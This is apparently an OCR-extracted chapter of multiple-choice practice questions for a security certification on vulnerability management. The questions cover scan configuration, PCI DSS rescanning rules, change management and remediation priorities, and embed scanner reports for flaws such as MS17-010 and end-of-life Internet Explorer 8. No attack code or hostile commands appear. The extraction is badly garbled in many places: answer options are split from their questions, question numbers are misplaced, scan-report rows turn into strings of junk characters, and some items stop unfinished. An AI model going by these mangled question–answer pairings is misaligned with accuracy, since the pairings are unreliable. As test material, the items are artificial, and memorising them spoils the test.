First Detected: 03/04/2017 at 21:44:56 (GMT-0400) Last Detected: 04/04/2017 at 21:57:33 (GMT-0400) 
QID: 91331 CVSS Base: 9.3 
Category: Windows CVSS Temporal: 8.1 
CVE ID: CVE-2017-0001 CVE-2017-0005 CVE- CVSS3 Base: 7.8 
2017-0014 CVE-2017-0025 CVE-2017- CVSS3 Temporal: 7.4 
0038 CVE-2017-0047 CVE-2017-0060 CVSS Environment: 
CVE-2017-0061 CVE-2017-0062 CVE- Asset Group: 
2017-0063 CVE-2017-0073 CVE-2017- Collateral Damage Potential: 
0108 Target Distribution: 
Vendor Reference MS17-013 Confidentiality Requirement: - 
Bugtraq ID: 96057, 96033, 96013, 96626, 96023, 96034, 96713, BA6AEt9RdguB660Gn86722, 96637 - 
Service Modified: 03/14/2017 Availability Requirement: - 
User Modified: 
Edited: No 
PCI Vuln: Yes 
Ticket State: Open 
THREAT: 
This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Microsoft Lync, 
and Microsoft Silverlight. 


The security update addresses the vulnerabilities by correcting how the software handles objects in memory. 

This security update is rated Critical for: All supported releases of Microsoft Windows Affected editions of 

Microsoft Office 2007 and Microsoft Office 2010 Affected editions of Skype for Business 2016, Microsoft Lync 2013, 
and Microsoft Lync 2010 Affected editions of Silverlight 


IMPACT: 
The most severe of these vulnerabilities could allow remote code execution if a user either visits a specially crafted 
website or opens a specially crafted document. 


Restrict interactive logins to the system. 
Remove Microsoft Office from the server. 


Remove Internet Explorer from the server. 


Apply the security patch. 


Garrett is configuring vulnerability scanning for a new web server that his organization is 
deploying on its DMZ network. The server hosts the company’s public website. What type 
of scanning should Garrett configure for best results? 


A. 


B. 
C. 
D 


Garrett should not perform scanning of DMZ systems. 
Garrett should perform external scanning only. 
Garrett should perform internal scanning only. 


Garrett should perform both internal and external scanning. 
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107. Frank recently ran a vulnerability scan and identified a POS terminal that contains an 
unpatchable vulnerability because of running an unsupported operating system. Frank 
consults with his manager and is told that the POS is being used with full knowledge of 
management and, as a compensating control, it has been placed on an isolated network 
with no access to other systems. Frank’s manager tells him that the merchant bank is 
aware of the issue. How should Frank handle this situation? 


A. Document the vulnerability as an approved exception. 


B. Explain to his manager that PCI DSS does not permit the use of unsupported operat- 
ing systems. 


C. Decommission the POS system immediately to avoid personal liability. 
D. Upgrade the operating system immediately. 
108. James is configuring vulnerability scans of a dedicated network that his organization uses 


for processing credit card transactions. What types of scans are least important for James 
to include in his scanning program? 


A. Scans from a dedicated scanner on the card processing network 
B. Scans from an external scanner on his organization’s network 
C. Scans from an external scanner operated by an approved scanning vendor 
D. All three types of scans are equally important. 
109. Helen performs a vulnerability scan of one of the internal LANs within her organization 
and finds a report of a web application vulnerability on a device. Upon investigation, she 


discovers that the device in question is a printer. What is the most likely scenario in this 
case? 


A. The printer is running a web server. 
B. The report is a false positive result. 
C. The printer recently changed IP addresses. 
D. Helen inadvertently scanned the wrong network. 
110. Joe discovered a critical vulnerability in his organization’s database server and received 
permission from his supervisor to implement an emergency change after the close of busi- 


ness. He has eight hours before the planned change window. In addition to planning the 
technical aspects of the change, what else should Joe do to prepare for the change? 


A. Ensure that all stakeholders are informed of the planned outage. 

B. Document the change in his organization’s change management system. 
C. Identify any potential risks associated with the change. 

D. All of the above 
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111. Julian recently detected the vulnerability shown here on several servers in his environment. 
Because of the critical nature of the vulnerability, he would like to block all access to the 
affected service until it is resolved using a firewall rule. He verifies that the following TCP 
ports are open on the host firewall. Which one of the following does Julian not need to 
block to restrict access to this service? 


v BM 5 Microsoft SMB Server Remote Code Execution Vulnerability (MS17-010) 


First Detected: 04/05/2017 at 02:25:12 (GMT-0400) Last Detected: 04/05/2017 at 02:25:12 (GMT-0400) 

QID: 91345 CVSS Base: 9.3 

Category: Windows CVSS Temporal: 6.9 

CVE ID: CVE-2017-0143 CVE-2017-0144 CVE- CVSS3 Base: 8.1 
2017-0145 CVE-2017-0146 CVE-2017- CVSS3 Temporal: 7.1 
0148 CVE-2017-0147 CVSS Environment: 

Vendor Reference MSi7-010 Asset Group: - 

Bugtraq ID: 96703, 96704, 96705, 96707, 96709, 96706 Collateral Damage Potential: - 

Service Modified: 03/15/2017 Target Distribution: - 

User Modified: - Confidentiality Requirement: 

Edited: No Integrity Requirement: 

PCI Vuln: Yes Availability Requirement: 

Ticket State: Open 

THREAT: 


Microsoft Server Message Block (SMB) Protocol is a Microsoft network file sharing protocol used in Microsoft Windows. 
The Microsoft SMB Server is vulnerable to multiple remote code execution vulnerabilities due to the way that the Microsoft 
Server Message Block 1.0 (SMBv1) server handles certain requests. 

This security update is rated Critical for all supported editions of Windows Vista, Windows Server 2008, Windows 7, 
Windows Server 2008 R2, Windows Server 2012 and 2012 R2, Windows 8.1 and RT 8.1, Windows 10 and Windows 
Server 2016. 


IMPACT: 
A remote attacker could gain the ability to execute code by sending crafted messages to a Microsoft Server Message 
Block 1.0 (SMBv1) server. 


SOLUTION: 
Customers are advised to refer to Microsoft Advisory MS17-010 for more details. 


A. 137 
B. 139 
C. 389 
D. 445 


112. Ted recently ran a vulnerability scan of his network and was overwhelmed with results. He 
would like to focus on the most important vulnerabilities. How should Ted reconfigure his 
vulnerability scanner? 


A. Increase the scan sensitivity. 
B. Decrease the scan sensitivity. 
C. Increase the scan frequency. 
D 


Decrease the scan frequency. 
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113. After running a vulnerability scan, Janet discovered that several machines on her network 
are running Internet Explorer 8 and reported the vulnerability shown here. Which one of 
the following would not be a suitable replacement browser for these systems? 


v BME 5 EOL/Obsolete Software: Microsoft Internet Explorer 8 Detected 


First Detected: 02/04/2016 at 19:05:19 (GMT-0400) Last Detected: 04/05/2017 at 02:19:36 (GMT-0400) 
QID: 105646 CVSS Base: 9.3) 
Category: Security Policy CVSS Temporal: 7.9 
CVE ID: - CVSS3 Base: ° 
Vendor Reference Microsoft Support Lifecycle for Internet CVSS3 Temporal: - 
Explorer CVSS Environment: 
Bugtraq ID: - Asset Group: ° 
Service Modified: 03/09/2016 Collateral Damage Potential: - 
User Modified: - Target Distribution: - 
Edited: No Confidentiality Requirement: - 
PCI Vuln: Yes Integrity Requirement: - 
Ticket State: Open Availability Requirement: - 
THREAT: 
Microsoft Internet Explorer is a graphical web browser developed by Microsoft and included as part of the Microsoft Windows 
operating systems. 


The host is running Intemet Explorer 8 software. Microsoft ended suppor for Internet Explorer 8 on January 12, 2016. 
No further updates, including security updates, are available for Internet Explorer 8. 


IMPACT: 


The system is at high risk of being exposed to security vulnerabilities. Since the vendor no longer provides updates, obsolete 
software is more vulnerable to viruses and other attacks. 


Internet Explorer 10 
Google Chrome 
Mozilla Firefox 
Microsoft Edge 
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114. Sunitha discovered the vulnerability shown here in an application developed by her organi- 
zation. What application security technique is most likely to resolve this issue? 


v EHEN 4 Sun Java RunTime Environment GIF Images Buffer Overflow Vulnerability 


First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 03:03:58 (GMT-0400) 
QID: 115501 CVSS Base: 6.8 
Category: Local CVSS Temporal: 5.3 
CVE ID: CVE-2007-0243 CVSS3 Base: - 
Vendor Reference Oracle ID 1000058.1 CVSS3 Temporal: - 
Bugtraq ID: 22085 CVSS Environment: 

Service Modified: 10/21/2009 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: - 


Availability Requirement: - 
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Bounds checking 
Network segmentation 


Parameter handling 


909 9 > 


Tag removal 


115. Pete ran a vulnerability scan of several network appliances in his organization and received 
the scan result shown here. What is the simplest tool that an attacker could use to cause a 
denial-of-service attack on these appliances, provided that they are running ClearCase? 


v Be 3 Rational ClearCase Portscan Denial of Service Vulnerability 


First Detected: 04/05/2017 at 03:56:19 (GMT-0400) Last Detected: 04/05/2017 at 03:56:19 (GMT-0400) 

QID: 38248 CVSS Base: 5 

Category: General remote services CVSS Temporal: 3.9 

CVE ID: CVE-2002-1322 CVSS3 Base: - 

Vendor Reference - CVSS3 Temporal: - 

Bugtraq ID: 6228 CVSS Environment: 

Service Modified: 06/03/2009 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: No Confidentiality Requirement: 

Ticket State: Integrity Requirement: - 
Availability Requirement: - 

THREAT: 

Rational ClearCase is a software configuration management solution that provides version control as well as repositories for 

software development. 


Please ignore this report if Rational ClearCase is not installed on the host. 

Rational ClearCase has been reported to be prone to a denial of service condition. Its possible to cause this condition by 
portscanning a system running the vulnerable version of ClearCase. 

This vulnerability has been reported on ClearCase 4.1 and 2002.05 systems. 


IMPACT: 
An attacker can exploit this vulnerability by making two consecutive portscans of a vulnerable system. This exploitation will 
cause ClearCase to crash. Restarting the ClearCase service is required to restore functionality. 


SOLUTION: 
The vendor has released a patch to address this issue. Download the latest patch from IBM ClearCase Support's Web site. 


Metasploit 
Nessus 
nmap 


Wireshark 
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116. Which one of the following protocols might be used within a virtualization platform for 
monitoring and management of the network? 


A. SNMP 
B. SMTP 
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C. BGP 
D. EIGRP 
117. Sherry runs a vulnerability scan and receives the high-level results shown here. Her prior- 


ity is to remediate the most important vulnerabilities first. Which system should be her 
highest priority? 


System A 


System B 





@ Medium @ Informational 
A. A 
B. B 
C. C 
D. D 


118. Victor is configuring a new vulnerability scanner. He set the scanner to run scans of his 
entire data center each evening. When he went to check the scan reports at the end of the 
week, he found that they were all incomplete. The scan reports noted the error “Scan ter- 
minated due to start of preempting job.” Victor has no funds remaining to invest in the 
vulnerability scanning system. He does want to cover the entire data center. What should 
he do to ensure that scans complete? 


A. Reduce the number of systems scanned. 
B. Increase the number of scanners. 

C. Upgrade the scanner hardware. 
D 


Reduce the scanning frequency. 
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119. Vanessa ran a vulnerability scan of a server and received the results shown here. Her boss 
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instructed her to prioritize remediation based upon criticality. Which issue should she 
address first? 


Severity a 
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Plugin Name 


Apache 2.2.x < 2.2.28 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.16 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.17 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.18 APR apr_fnmatch DoS 


Apache 2.2.x < 2.2.21 mod_proxy_ajp DoS 


Apache 2.2.x < 2.2.22 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.23 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.24 Multiple XSS Vulnerabilities 


Apache 2.2.x < 2.2.25 Multiple Vulnerabilities 


Apache 2.2.x < 2.2.27 Multiple Vulnerabilities 


SSH Weak Algorithms Supported 


FTP Supports Cleartext Authentication 


SSH Server CBC Mode Ciphers Enabled 


SSH Weak MAC Algorithms Enabled 


Service Detection 


Nessus SYN scanner 


HTTP Server Type and Version 


PHP Version 


IMAP Service Banner Retrieval 


POP Server Detection 


Remove the POP server. 
Remove the FTP server. 
Upgrade the web server. 


Remove insecure cryptographic protocols. 


Plugin Family 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Web Servers 


Misc. 


Misc. 


Service detection 


Port scanners 


Web Servers 


Web Servers 


Service detection 


Service detection 


Count 


19 


15 
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120. Gil is configuring a scheduled vulnerability scan for his organization using the 
QualysGuard scanner. If he selects the Relaunch On Finish scheduling option shown 


here, what will be the result? 


Edit Scheduled Vulnerability Scan 


Task Title 


Target Hosts 


C. 


D. 


? Scheduling 


Tum help tips: On | Off Launch Help 


fa x 





Start: 


Duration: 
Resume Days: 


Occurs: 


— 
Aug 07, 2018 31 03:00 


(GMT -05:00) United States, Connecticut (Eastern Stand: Y 


~)| Pause $| after! 01 $| hours 
Manually 


v Daily 
Weekly 
Monthly 


Relaunch on Finish 


TV Ends after! Occurrences 





The scan will run once each time the schedule occurs. 


The scan will run twice each time the schedule occurs. 


_) DST 


The scan will run twice the next time the schedule occurs and once on each subse- 


quent schedule interval. 


The scan will run continuously until stopped. 


121. Terry is reviewing a vulnerability scan of a Windows server and came across the vulner- 
ability shown here. What is the risk presented by this vulnerability? 


E 
First Detected: 09/28/2015 at 10:42:15 (GMT-0400) 
QID: 90023 
Category: Windows 
CVE ID: - 
Vendor Reference - 
Bugtraq ID: - 
Service Modified: 05/12/2009 
User Modified: - 
Edited: No 
PCI Vuln: No 
Ticket State: 
THREAT: 


| 1 Detected Compatibility 8.3 Filename Feature 


CVSS Base: 


CVSS Temporal: 


CVSS3 Base: 


CVSS3 Temporal: 
CVSS Environment: 
Asset Group: 


Last Detected: 04/05/2017 at 04:21:18 (GMT-0400) 


oW 
0 


Collateral Damage Potential: - 
Target Distribution: - 
Confidentiality Requirement: - 
Integrity Requirement: - 
Availability Requirement: - 


NTFS supports backward compatibility with older 16-bit software by restricting the allowed filenames to 8.3 format. 
This feature seems to be activated on this host. 


IMPACT: 


16-bit applications are extremely vulnerable and should not be used on a secure server. If you have not installed any 16-bit 
applications on a Windows NT-based computer, you can turn off automatic short (8-character name, 3-character extension) 
file name generation to speed up file and folder access on your computer running Windows NT. 


SOLUTION: 


We recommend that you remove this compatibility restriction. To do so, locate the following registry key, and then set the 
REG_DWORD 'NifsDisable8dot3NameCreation’ entry to '1': 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem 
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122. 
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A. Anattacker may be able to execute a buffer overflow and execute arbitrary code on 
the server. 


B. An attacker may be able to conduct a denial-of-service attack against this server. 


© 


An attacker may be able to determine the operating system version on this server. 
D. There is no direct vulnerability, but this information points to other possible vulner- 
abilities on the server. 


Andrea recently discovered the vulnerability shown here on the workstation belonging to 
a system administrator in her organization. What is the major likely threat that should 
concern Andrea? 


v EEE 3 PuTTY Local Information Disclosure Vulnerability 


First Detected: 04/05/2017 at 02:19:36 (GMT-0400) Last Detected: 04/05/2017 at 02:19:36 (GMT-0400) 
QID: 123511 CVSS Base: 2.1 
Category: Local CVSS Temporal: 1.6 
CVE ID: CVE-2015-2157 CVSS3 Base: - 
Vendor Reference PuTTY vulnerability CVSS3 Temporal: 

Bugtraq ID: 72825 CVSS Environment: 

Service Modified: 03/08/2017 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: No Confidentiality Requirement: 

Ticket State: Integrity Requirement: 


Availability Requirement: 


THREAT: 

PuTTY is a client program for the SSH, Telnet and Riogin network protocols. It is integrated in multiple applications on multiple 
operating systems for providing SSH, Telnet and Riogin protocol support. 

The ssh2_load_userkey and ssh2_save_userkey functions implemented in vulnerable PuTTY versions, fail to properly wipe 
SSH-2 private keys from memory. 


A. An attacker could exploit this vulnerability to take control of the administrator’s 
workstation. 


B. An attacker could exploit this vulnerability to gain access to servers managed by the 
administrator. 


C. An attacker could exploit this vulnerability to prevent the administrator from using 
the workstation. 


D. An attacker could exploit this vulnerability to decrypt sensitive information stored on 
the administrator’s workstation. 
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123. Craig completed the vulnerability scan of a server in his organization and discovered the 
results shown here. Which one of the following is not a critical remediation action dictated 
by these results? 


> 


w~NVTwTN ww MB VN TH WSN BV EESE VE wT. TF VS VS 





7172.19.88 eo Windows Server 2008 R2 Enterprise 64 bit Edition Service Pack 1 
~ Vulnerabilities (71) HE 

WME 5 Google Chrome Prior to 57.0.2987.98 Multiple Vulnerabilities CVSS: - CVSS3: - New ($7) 
WME 5 Microsoft Cumulative Security Update for Windows (MS17-012) CVSS: - CVSS3:- New [$7 
EEEN 4 Google Chrome Prior to 57.0.2987.133 Multiple Vulnerabilities CVSS: - CVSS3:- New [- 
EEEN 4 Microsoft Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17-011) CVSS: - CVSS3:- New [- 
WENN | 4 Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) CVSS: - CVSS3:- New (pr) 
WEBB 4 Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021) CVSS: - CVSS3:- New [$7 
WMH 4 Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022) CVSS: - CVSS3: - New [$~] 
HEEE 4 Microsoft Windows Kernel Elevation of Privileges (MS17-017) CVSS: - CVSS3:- New [> 
Hoa 3 NotePad++ “scilexer.dll” OLL Hijacking Vulnerability CVSS: - CVSS3:- New [$7 
Baa 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 3389/tcp over SSL CVSS: - CVSS3:- New {ey 
WME 5 Oracle Java SE Critical Patch Update - October 2016 CVSS: - CVSS3:- Active [$v 
BMMMM 5 EOL/Obsolete Software: Microsoft VC++ 2005 Detected CVSS: - CVSS3: - Active iC oa 
MMMM 5 Oracle Java SE Critical Patch Update - January 2017 CVSS: - CVSS3:- Active [$7 
WME 5 Oracle Java SE Critical Patch Update - October 2012 CVSS: - CVSS3:- Active [$v 
WM 5 Oracle Java SE Critical Patch Update - February 2013 CVSS: - CVSS3: - Active C 
WWMM 5 Oracle Java SE JVM 2D Subcomponent Remote Code Execution Vulnerability (Oracle Security Alert for CVE-2013-1493) CVSS: - CVSS3: - Active [$v 
EHEHEH 5 EOLObsolete Software: Microsoft.NET Framework 4 - 4.5.1 Detected CVSS: - CVSS3: - Active ($~ 
EEEHHN 5 EOL/Obsolete Software: Microsoft Internet Explorer 8 Detected CVSS: - CVSS3:- Active [$7 
WBBM 5 EOL/Obsolete Software: Oracle Java SE/JRE/JDK 6/1.6 Detected CVSS: - CVSS3:- Active [$v 
WIM 5 Oracle Java SE Critical Patch Update - April 2013 CVSS: - CVSS3:- Active (pr 
WME 5 Oracle Java SE Critical Patch Update - June 2013 CVSS: - CVSS3: - Active iC a 
WM 5 Oracle Java SE Critical Patch Update - July 2014 CVSS: - CVSS3:- Active [d~] 
WBBM 5 Oracle Java SE Critical Patch Update - October 2014 CVSS: - CVSS3:- Active [$v 
WMMMM 5 Oracle Java SE Critical Patch Update - January 2015 CVSS: - CVSS3: - Active [~] 

A. Remove obsolete software. 

B. Reconfigure the host firewall. 

C. Apply operating system patches. 

D. Apply application patches. 


124. 


125. 


Tom’s company is planning to begin a bring your own device (BYOD) policy for mobile 
devices. Which one of the following technologies allows the secure use of sensitive infor- 
mation on personally owned devices, including providing administrators with the ability 
to wipe corporate information from the device without affecting personal data? 


A. 
B. 
C. 
D. 


Remote wipe 
Strong passwords 
Biometric authentication 


Containerization 


Sally discovered during a vulnerability scan that a system that she manages has a high- 
priority vulnerability that requires a patch. The system is behind a firewall and there is no 
imminent threat, but Sally wants to get the situation resolved as quickly as possible. What 
would be her best course of action? 


A. 


B. 
C. 
D 


Initiate a high-priority change through her organization’s change management process. 
Implement a fix immediately and then document the change after the fact. 
Implement a fix immediately and then inform her supervisor of her action and the rationale. 


Schedule a change for the next quarterly patch cycle. 
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126. Gene runs a vulnerability scan of his organization’s data center and produces a summary 


Vulnerabilities 


report to share with his management team. The report includes the chart shown here. 
When Gene’s manager reads the report, she points out that the report is burying important 
details because it is highlighting too many unimportant issues. What should Gene do to 
resolve this issue? 








| Vulnerabilities by Severity 
J Severity Level 

85 é 2 Severity 5 

76 f i 1 Severity 4 

67 Ea 24 Severity 3 

= m] 85 Severity 2 
O 3 Severity 1 

49 i 115 Total 

40 é 

31 f 

22 f 

13 f 

4 M [m] 
5 4 3 2 1 


127. 


128. 


Severity Level 


Tell his manager that all vulnerabilities are important and should appear on the report. 
Create a revised version of the chart using Excel. 


Modify the sensitivity level of the scan. 
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Stop sharing reports with the management team. 


Veronica recently conducted a PCI DSS vulnerability scan of a web server and noted a crit- 
ical PHP vulnerability that required an upgrade to correct. She applied the update. How 
soon must Veronica repeat the scan? 


A. Within 30 days 

B. Atthe next scheduled quarterly scan 

C. Atthe next scheduled annual scan 

D. Immediately 

Chandra’s organization recently upgraded the firewall protecting the network where they 


process credit card information. This network is subject to the provisions of PCI DSS. 
When is Chandra required to schedule the next vulnerability scan of this network? 


A. Immediately 

B. Within one month 

C. Before the start of next month 

D. Before the end of the quarter following the upgrade 


129. 


130. 


131. 


132. 


Chapter 2 = Domain 2: Vulnerability Management 113 


Bruce is concerned about the security of an industrial control system that his organization 
uses to monitor and manage systems in their factories. He would like to reduce the risk of 
an attacker penetrating this system. Which one of the following security controls would 
best mitigate the vulnerabilities in this type of system? 


A. Network segmentation 
B. Input validation 

C. Memory protection 

D. Redundancy 


Glenda routinely runs vulnerability scans of servers in her organization. She is having dif- 
ficulty with one system administrator who refuses to correct vulnerabilities on a server used 
as a jumpbox by other IT staff. The server has had dozens of vulnerabilities for weeks and 
would require downtime to repair. One morning, her scan reports that all of the vulner- 
abilities suddenly disappeared overnight, while other systems in the same scan are reporting 
issues. She checks the service status dashboard, and the service appears to be running prop- 
erly with no outages reported in the past week. What is the most likely cause of this result? 


A. The system administrator corrected the vulnerabilities. 

B. The server is down. 

C. The system administrator blocked the scanner. 

D. The scan did not run. 

Frank discovered during a vulnerability scan that an administrative interface to one of his 
storage systems was inadvertently exposed to the Internet. He is reviewing firewall logs 


and would like to determine whether any access attempts came from external sources. 
Which one of the following IP addresses reflects an external source? 


A. 10.15.1.100 
B. 12.8.1.100 

C. 172.16.1.100 
D. 192.168.1.100 


Nick is configuring vulnerability scans for his network using a third-party vulnerability 
scanning service. He is attempting to scan a web server that he knows exposes a CIFS file 
share and contains several significant vulnerabilities. However, the scan results only show 
ports 80 and 443 as open. What is the most likely cause of these scan results? 


A. The CIFS file share is running on port 443. 

B. A firewall configuration is preventing the scan from succeeding. 
C. The scanner configuration is preventing the scan from succeeding. 
D 


The CIFS file share is running on port 80. 
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133. Thomas learned this morning of a critical security flaw that affects a major service used 
by his organization and requires immediate patching. This flaw was the subject of news 
reports and is being actively exploited. Thomas has a patch and informed stakeholders of 
the issue and received permission to apply the patch during business hours. How should he 
handle the change management process? 


A. 


B. 


Thomas should apply the patch and then follow up with an emergency change request 
after work is complete. 


Thomas should initiate a standard change request but apply the patch before waiting 
for approval. 


Thomas should work through the standard change approval process and wait until it 
is complete to apply the patch. 


Thomas should file an emergency change request and wait until it is approved to apply 
the patch. 


Questions 134 through 136 refer to the bare-metal virtualization environment shown here: 





134. What component is identified by A in the image? 


A. 
B. 
C. 
D. 


Hy pervisor 
Host operating system 
Guest operating system 


Physical hardware 


135. What component is identified by B in the image? 


A. 
B. 
C. 
D. 


Hypervisor 
Host operating system 
Guest operating system 


Physical hardware 


136. What component is identified by C in the image? 


A. 
B. 
C. 
D. 


Hypervisor 
Host operating system 
Guest operating system 


Physical hardware 


137. After running a vulnerability scan of systems in his organization’s development shop, 
Mike discovers the issue shown here on several systems. What is the best solution to this 
vulnerability? 


138. 


139. 


140. 
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BMMMH 5 EOL/Obsolete Software: Microsoft.NET Framework 4 - 4.5.1 Detected 


First Detected: 02/04/2016 at 19:05:19 (GMT-0400) Last Detected: 04/05/2017 at 01:00:07 (GMT-0400) 
QID: 105648 CVSS Base: 9.34 
Category: Security Policy CVSS Temporal: 7.9 
CVE ID: - CVSS3 Base: ° 
Vendor Reference Microsoft NET Framework Product CVSS3 Temporal: 

Lifecycle CVSS Environment: 
Bugtraq ID: - Asset Group: 
Service Modified: 03/10/2016 Collateral Damage Potential: 
User Modified: - Target Distribution: 
Edited: No Confidentiality Requirement: 
PCI Vuln: Yes Integrity Requirement: 
Ticket State: Open Availability Requirement: 


Apply the required security patches to this framework. 
Remove this framework from the affected systems. 
Upgrade the operating system of the affected systems. 


No action is necessary. 


Chris is preparing to conduct vulnerability scans against a set of workstations in his orga- 
nization. He is particularly concerned about system configuration settings. Which one of 
the following scan types will give him the best results? 


A. 
B. 
C. 
D. 


Unauthenticated scan 
Credentialed scan 
External scan 


Internal scan 


Brian is configuring a vulnerability scan of all servers in his organization’s data center. He 
is configuring the scan to only detect the highest-severity vulnerabilities. He would like to 
empower system administrators to correct issues on their servers but also have some insight 
into the status of those remediations. Which approach would best serve Brian’s interests? 


A. 
B. 


Give the administrators access to view the scans in the vulnerability scanning system. 


Send email alerts to administrators when the scans detect a new vulnerability on their 
servers. 


Configure the vulnerability scanner to open a trouble ticket when they detect a new 
vulnerability on a server. 


Configure the scanner to send reports to Brian who can notify administrators and 
track them in a spreadsheet. 


Tonya is configuring a new vulnerability scanner for use in her organization’s data center. 
Which one of the following values is considered a best practice for the scanner’s update 


frequency? 

A. Daily 

B. Weekly 

C. Monthly 
D. Quarterly 
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141. Ben was recently assigned by his manager to begin the remediation work on the most 
vulnerable server in his organization. A portion of the scan report appears below. What 
remediation action should Ben take first? 


A. Install patches for Adobe Flash. 
B. Install patches for Firefox. 
C. Run Windows Update. 


D. Remove obsolete software. 


v17219. = oo eS SS E E Windows Server 2012 Datacenter 64 bit Edition 
wv Vulnerabilities (50) HE 


> MM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA2017-05,MFSA2017-06) CVSS: - CVSS3: - New +>) 
> MERI 5 Adobe Flash Player Remote Code Execution Vulnerability (APSB17-07) CVSS: - CVSS3: - New [ar] 
> MMMM 5 Mozilla Firefox Integer Overflow Vulnerability (MFSA2017-08) CVSS: - CVSS3:- New [by 
> MIM 5 Microsoft SMB Server Remote Code Execution Vulnerability (MS17-010) CVSS: - CVSS3:- New [ey 
> MMMM 5 Microsoft Cumulative Security Update for Internet Explorer (MS17-006) CVSS: - CVSS3:- New ($v) 
> MMM 5 Microsoft Windows Update for Vulnerabilities in Adobe Flash Player in Internet Explorer and Edge (MS17-023) CVSS: - CVSS3:- New (d7) 
> EEEE | 4 Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022) CVSS: - CVSS3:- New ($7) 
> MINIM | 4 Microsoft liS Server XSS Elevation of Privilege Vulnerability (MS17-016) CVSS: - CVSS3:- New fr) 
> MII | 4 Microsoft Windows Kernel Elevation of Privileges (MS17-017) CVSS: - CVSS3:- New ($~ 
> EEEE 4 Microsoft Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17-011) CVSS: - CVSS3:- New [ey 
> EEEE 4 Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) CVSS: - CVSS3:- New [ey 
> MINI 4 Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021) CVSS: - CVSS3:- New {a 
> Ba 3 NotePad++ “scilexer.dll” DLL Hijacking Vulnerability CVSS: - CVSS3:- New [ey 
> MIEN | 3 Microsoft Windows PDF Library Remote Code Execution Vulnerability (MS17-009) CVSS: - CVSS3:- New fe 
> Bae 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 3389/tcp over SSL CVSS: - CVSS3:- New [a+ 
> MMM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA2016-94,MFSA2016-95) CVSS: - CVSS3: - Active E) 
> MEM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA 2015-116 and MFSA 2015-133) CVSS: - CVSS3: - Active CH 
> MMM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA2016-89,MFSA2016-90) CVSS: - CVSS3: - Active +>) 
> MMM 5 Mozilla Firefox and Thunderbird SVG Animation Remote Code Execution Vulnerability (MFSA2016-92) CVSS: - CVSS3:- Active ($v 
> MMMM 5 EOL/Obsolete Software: Microsoft VC++ 2005 Detected CVSS: - CVSS3:- Active (+ 
> MMM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA2017-01,MFSA2017-02) CVSS: - CVSS3:- Active [+ 
> (RNIN 5 Adobe Flash Player Remote Code Execution Vulnerability (APSB17-04) CVSS: - CVSS3:- Active [+ 
> MMMM 5 Microsoft Windows Update for Vulnerabilities in Adobe Flash Player in Internet Explorer (MS17-005) CVSS: - CVSS3:- Active [$v 
> EEEEHN 5 EOL/Obsolete Software: Microsoft.NET Framework 4 - 4.5.1 Detected CVSS: - CVSS3:- Active [+] 
> MMMM 5 Mozilla Firefox Multiple Vulnerabilities (MFSA 2016-85 to MFSA 2016-86) CVSS: - CVSS3:- Active (+ 
> EEEE 4 Microsoft Windows .NET Framework Information Disclosure Vulnerability (MS16-091) CVSS: - CVSS3:- Active [$v 
> BM 4 Mozilla Firefox Multiple Vulnerabilities (MFSA 2016-16 to MFSA 2016-38) CVSS: - CVSS3:- Active (+ 


142. Tom is planning a series of vulnerability scans and wants to ensure that the organization 
is Meeting its customer commitments with respect to the scans’ performance impact. What 
two documents should Tom consult to find these obligations? 


A. SLAs and MOUs 
B. SLAs and DRPs 
C. DRPs and BIAs 
D. BIAs and MOUs 
143. Don is evaluating the success of his vulnerability management program and would like to 
include some metrics. Which one of the following would be the least useful metric? 
A. Time to resolve critical vulnerabilities 
B. Number of open critical vulnerabilities over time 
C. Total number of vulnerabilities reported 
D 


Number of systems containing critical vulnerabilities 
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144. Don completed a vulnerability scan of his organization’s virtualization platform from an 
external host and discovered the vulnerability shown here. How should Don react? 


145. 
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vE 1 Remote Management Service Accepting Unencrypted Credentials Detected 
First Detected: 09/04/2015 at 18:04:22 (GMT-0400) 
QID: 45242 
Category: Information gathering 
CVE ID: - 
Vendor Reference - 
Bugtraq ID: - 
Service Modified: 08/10/2016 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: 


This issue should be corrected as time permits. 


CVSS Temporal: 


CVSS3 Temporal: 
CVSS Environment: 


Collateral Damage Potential: 
Target Distribution: 
Confidentiality Requirement: 
Integrity Requirement: 
Availability Requirement: 


This issue has a very low severity and does not require remediation. 


Last Detected: 04/05/2017 at 00:05:04 (GMT-0400) 


4.34) 
3.3 


This is a critical issue that requires immediate adjustment of firewall rules. 


This is a critical issue, and Don should shut down the platform until it is corrected. 


Elliott runs a vulnerability scan of one of the servers belonging to his organization and 


finds the results shown here. Which one of these statements is mot correct? 


w Vulnerabilities (29) A&G 


> 
> 
> 
> 
d 
d 
> 
d 
> 
> 
> 
d 
> 
d 
> 
d 
> 
> 
> 
> 
> 
d 
d 
> 
d 
> 
d 
> 
> 


